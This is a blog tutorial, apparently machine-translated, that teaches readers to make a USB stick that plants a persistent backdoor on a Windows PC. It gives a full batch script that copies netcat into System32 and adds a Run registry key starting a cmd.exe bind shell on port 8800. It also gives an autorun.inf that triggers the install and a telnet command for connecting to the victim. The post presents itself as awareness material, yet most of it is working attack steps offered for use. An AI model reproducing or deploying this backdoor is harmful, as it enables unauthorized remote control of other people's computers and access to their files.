In previous articles we saw how to create a USB key that retrieves a computer passwords.
Today we will see how to create a USB that opens a backdoor on a Windows computer.
This rootkit runs automatically and creates a backdoor that allows you to access your PC remotely from any machine. As usual the goal this tutorial is to show business leaders how to use USB sticks can be dangerous. What is true for companies is not less for individuals. :)
To create our USB backdoor, we will follow the above steps:
step 1
First, we will create a folder on our USB stick and then we will download Netcat, a utility to open network connections, either UDP or TCP. You can also use cryptcat, netcat clone with the only condition that the latter figure communications.
Download Netcat for Windows
After downloading netcat, it unzips Netcat in the folder created.
Step 2
Then you have created a backdoor.bat file, it will execute two instructions:
Copy netcat files in the System32 folder on the target computer
Add a string value in the registry so that our backdoor starts at every boot the computer
To do this: we must create a new text document using Notepad or another and write the code below:
copy *.* "%SYSTEMROOT%/System32" REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "backdoor" /t "REG_SZ" /d "%SYSTEMROOT%\System32\nc.exe -d -L -e cmd.exe -p 8800"
Step 3
Now we get to create the autorun.inf file
In this step we will create a new option in the window that appears is the insertion of a USB that will allow us (once click it) our backdoor is installed on the target computer.
To realize this we open a new text document and then insert this code:
[Autorun]
open = backdoor.bat
ACTION = "give a name for this action"
Finally, it saves the file under the root of the key under the name autorun.inf
Now insert your USB key, a menu appears, select the name of the new option that you have created.
After inserting the USB key, you can from any computer connect to the remote station with a single command:
telnet 192.168.1.17 8800
192.168.1.17 is the IP address of the remote machine that you need to replace. And 8800 is the port used to connect .
And now, you're home! You can do whatever you want: play your files, write files, run a search, run a program, in short you are home.
To disconnect, type "logout".
Enjoy :D
Remember that the best support for this blog is to love and share our articles!
I founded the Blog DepoTech in January 2015. Self-taught in development, I have always pushed my curiosity about the topics,Web and Tech news.
ConversionConversion EmoticonEmoticon